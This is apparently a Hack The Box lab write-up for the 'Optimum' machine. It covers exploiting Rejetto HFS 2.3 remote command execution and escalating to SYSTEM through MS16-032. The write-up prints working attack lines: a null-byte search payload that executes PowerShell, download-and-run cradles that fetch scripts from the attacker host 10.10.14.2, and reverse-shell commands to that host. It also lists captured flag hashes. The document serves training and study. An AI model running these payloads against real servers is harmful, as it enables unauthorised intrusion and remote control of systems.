Hacking
GithubTwitter
Search…
Hacking
Hacking, Bug Bounties & Penetration Testing
The Hacker Lab
Methodologies
Basic Buffer Overflow
Basic Internal Network test
Basic Mobile Testing guide
Basic Subdomain Enumeration guide
Guides
Build A Raspberry Pi Dropbox
Golang
Powershell / PowerView
PurpleSharp
Hack The Box last updated - 2019
Legacy
Devel
Optimum
Popcorn
Beep
Tenten
Arctic
Cronos
Grandpa
Granny
October
Lazy
Sneaky
Holiday
Blocky
Shrek
Blue
Joker
Europa
Haircut
Bank
SolidState
Mantis
Shocker
Tally
Sense
Jeeves
Stratosphere
Inception
Bashed
Fluxcapacitor
Canape
Rabbit
Chatterbox
Nibbles
Sunday
Aragog
Valentine
Silo
Olympus
Poison
Celestial
Waldo
Jerry
Access
Active
Netmon
Powered By GitBook
Optimum

Optimum - 10.10.10.8

Target Enumeration

IP: 10.10.10.9
User: d0c39409d7b994a9a1389ebf38ef5f73
Root: 51ed1b36553c8461f4552c2e92b3eeed

Ports / Services / Software Versions Running

80/tcp open http HttpFileServer httpd 2.3

Vulnerability Exploited:

Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution

Vulnerability Explanation:

Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a poor regex in the file ParserLib.pas. This module exploits the HFS scripting commands by using '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b over Windows XP SP3, Windows 7 SP1 and Windows 8.

Privilege Escalation

MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) - Local Privilege Escalation

Replicating the exploit:

Nmap
UDP
Port 80 in browser
Version number on page and in sourcecode:
Searchsploit
Copy to current dir
searchsploit -m windows/remote/39161.py
Modify the file with
Requires nc in current dir server over port 80 and start a listener on port 443
Execute the script
Now you have a low priv shell
Proof
That’s the easy way. There is also a metasploit module. Harder way, via the webapp.
Null bytes allow code execution
Send that to the repeater and ping your localhost
Use TCP dump to see if you can see the ping
Now download nishang
Copy powershell command to local folder (do not edit)
cp nishang/Shells/Invoke-PowerShellTcp.ps1 .
Add the following to the bottom of the file
Check you can ping with powershell
/?search=%00{.exec|C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe ping 10.10.14.2}
Check with tcpdump which should respond.
Replace ping with the following which needs to be URL encoded.:
/?search=%00{.exec|C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2/Invoke-PowerShellTcp.ps1').}​
After a while you will have a Powershell shell.
Run systeminfo and Sherlock.ps1 from within powershell
IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.2/Sherlock.ps1")
It appears its vulnerable to MS16-032
We do not have an interactive session so will need to download Empire to elevate our privileges
cp /root/Data/Lab/Hackthebox/HackTheBox/10.10.10.8/10.10.10.8/Empire/data/module_source/privesc/Invoke-MS16032.ps1
Modify with this line at the bottom
Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.2/shell.ps1')"
Copy existing powershell tcp script to shell.ps1
Amend the last line to the following and set up a nc listener on port 444
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 444
Execute the following as a low priv user:
IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.2/Invoke-MS16032.ps1")
Wait for a while and you will receive a system shell.
Evidence
Hack The Box last updated - 2019 - Previous
Devel
Next - Hack The Box last updated - 2019
Popcorn
Last modified 3yr ago
Copy link
Outline
Optimum - 10.10.10.8
Target Enumeration
Ports / Services / Software Versions Running
Vulnerability Exploited:
Vulnerability Explanation:
Privilege Escalation
Replicating the exploit: